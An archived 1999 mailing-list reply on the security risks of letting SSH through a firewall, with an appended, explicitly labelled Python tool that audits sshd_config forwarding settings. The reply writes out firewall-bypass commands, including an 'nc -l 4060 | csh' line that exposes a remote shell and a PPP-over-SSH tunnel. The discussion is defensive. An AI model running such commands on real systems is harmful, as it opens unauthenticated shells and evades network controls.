Firewall Wizards mailing list archives
Re: SSH through firewall
From: James Neal - HandiCAT <neal () ee pdx edu>
Date: Mon, 05 Jul 1999 21:24:48 -0700
In message <782FA6543FA5D111933D0000F86AEFA8019AA0C1 () simail5 si bosch de> you write:
I'm thinking about allowing users in the trusted network to do ssh through a non-transparent application gateway firewall into an untrusted network. Do you think this is "secure"? I'm not sure because users can tunnel all kinds of protocols in ssh. What would be possible attacks?
Given the alternatives (ftp and telnet), I'd say SSH is a wonderful choice. That being said, some of "The bad" of SSH:

o Straight ssh -- directly from the source at ftp.cs.hut.fi -- allows users to forward ports from the outside machine across their secure channel to arbitrary ports on hosts inside your firewall.

o It's quite possible to run PPP over SSH. In fact, there's a HOWTO about doing just that in the Linux world. It's basically just a

    # ssh remotehost pppd | pppd

o Related to the first two items. There's nothing keeping a user from doing an "ssh remotehost nc -l 4060 | csh", to allow people to run shell commands by just connecting to port 4060 of the remote machine.

Of course, tools exist that allow one to bypass a firewall using HTTP, telnet, and the r* services as well, so if you /do/ allow SSH through, at least their hax0r packets will be going over an encrypted tunnel and not being sniffed or hijacked. :)
Do you think this is feasible with a non-transparent firewall? Do you know a firewall that is capable of this?
Urg.. Beats me. I don't even know how SSH would function over a non-transparent firewall.

-James

--
James Neal <jfneal () intermedia com>
Senior Systems Administrator - Intermedia Communications
I don't speak for Intermedia, yadadada.
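The forwarding behaviours James lists are, on a modern OpenSSH server, governed by a handful of sshd_config options, and the daemon's parsing rules (keywords are case-insensitive, the first value seen for a keyword wins, and Match blocks can re-enable things conditionally) make a config easy to misread. The following is an added example, not code from the thread or from OpenSSH: a small auditor that parses an sshd_config text and reports every forwarding option that is permissive either explicitly or by default. The defaults table assumes current OpenSSH semantics (the 1999-era ssh from ftp.cs.hut.fi had a different option set), and the two sample configs are constructed for illustration.

```python
"""Audit an OpenSSH sshd_config for the forwarding knobs discussed in the thread.

Assumption: OpenSSH's documented defaults and parsing rules (first value
per keyword wins; Match blocks scope the settings that follow them).
"""
import re

# OpenSSH defaults for the options that control the tunnelling described
# in the thread (assumed modern OpenSSH; not the 1999 ssh-1 daemon).
DEFAULTS = {
    "allowtcpforwarding": "yes",    # -L / -R port forwarding
    "permittunnel": "no",           # -w layer-2/3 tun devices (VPN-style)
    "gatewayports": "no",           # remote forwards bound to non-loopback
    "allowagentforwarding": "yes",
    "x11forwarding": "no",
}

# Values that leave a given option in a forwarding-capable state.
PERMISSIVE = {
    "allowtcpforwarding": {"yes", "all", "local", "remote"},
    "permittunnel": {"yes", "point-to-point", "ethernet"},
    "gatewayports": {"yes", "clientspecified"},
    "allowagentforwarding": {"yes"},
    "x11forwarding": {"yes"},
}

# "Keyword value" or "Keyword = value"; sshd only treats whole lines as comments.
_LINE = re.compile(r"^([A-Za-z0-9]+)(?:\s*=\s*|\s+)(.*)$")


def parse_sshd_config(text):
    """Split sshd_config into global settings and Match blocks.

    Returns (global_settings, match_blocks); match_blocks is a list of
    (criteria, settings).  Keywords are lower-cased and, as sshd does, the
    FIRST value seen for a keyword within a scope wins.
    """
    global_settings = {}
    match_blocks = []
    current = global_settings
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip().lower()
        if key == "match":
            current = {}                      # settings below apply only to this block
            match_blocks.append((value, current))
            continue
        current.setdefault(key, value)        # first occurrence wins
    return global_settings, match_blocks


def audit_forwarding(text):
    """Return (scope, option, value, source) for every permissive setting.

    source is 'explicit' or 'default'.  Match blocks are reported for any
    permissive value they carry, since they can re-enable forwarding that
    the global scope switched off.
    """
    global_settings, match_blocks = parse_sshd_config(text)
    findings = []
    for opt, default in DEFAULTS.items():
        value = global_settings.get(opt)
        source = "explicit" if value is not None else "default"
        if value is None:
            value = default
        if value in PERMISSIVE[opt]:
            findings.append(("global", opt, value, source))
    for criteria, settings in match_blocks:
        for opt, value in settings.items():
            if opt in PERMISSIVE and value in PERMISSIVE[opt]:
                findings.append(("match " + criteria, opt, value, "explicit"))
    return findings


# Constructed sample: looks tidy, but forwards because the option is never set.
LAX_CONFIG = """\
# sshd_config (constructed example)
Port 22
PermitRootLogin no
X11Forwarding no
"""

# Constructed sample: forwarding off globally, re-enabled for one group.
# The second AllowTcpForwarding line is ignored because the first value wins.
HARDENED_CONFIG = """\
AllowTcpForwarding no
AllowAgentForwarding no
PermitTunnel no
GatewayPorts no
X11Forwarding no
AllowTcpForwarding yes

Match Group vpn-admins
    AllowTcpForwarding yes
    PermitTunnel point-to-point
"""

if __name__ == "__main__":
    for name, cfg in (("lax", LAX_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name)
        for finding in audit_forwarding(cfg):
            print("  ", finding)
```

Note what these options do and do not cover: AllowTcpForwarding stops the -L/-R port forwards in James's first item, and PermitTunnel stops tun-device VPNs, but his `ssh remotehost pppd | pppd` and `nc -l 4060 | csh` items run ordinary remote commands over the session's stdin/stdout and are untouched by either; only restricting what the user may execute (a ForceCommand or restricted shell) addresses those.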
Current thread:
- SSH through firewall Ginsberg Rainer (QI/INF4) * (Jul 05)
- Re: SSH through firewall James Neal - HandiCAT (Jul 06)
- Re: SSH through firewall Kevin T. Shivers (Jul 06)
- Re: SSH through firewall Aaron D. Turner (Jul 08)
- Re: SSH through firewall Kevin Steves (Jul 12)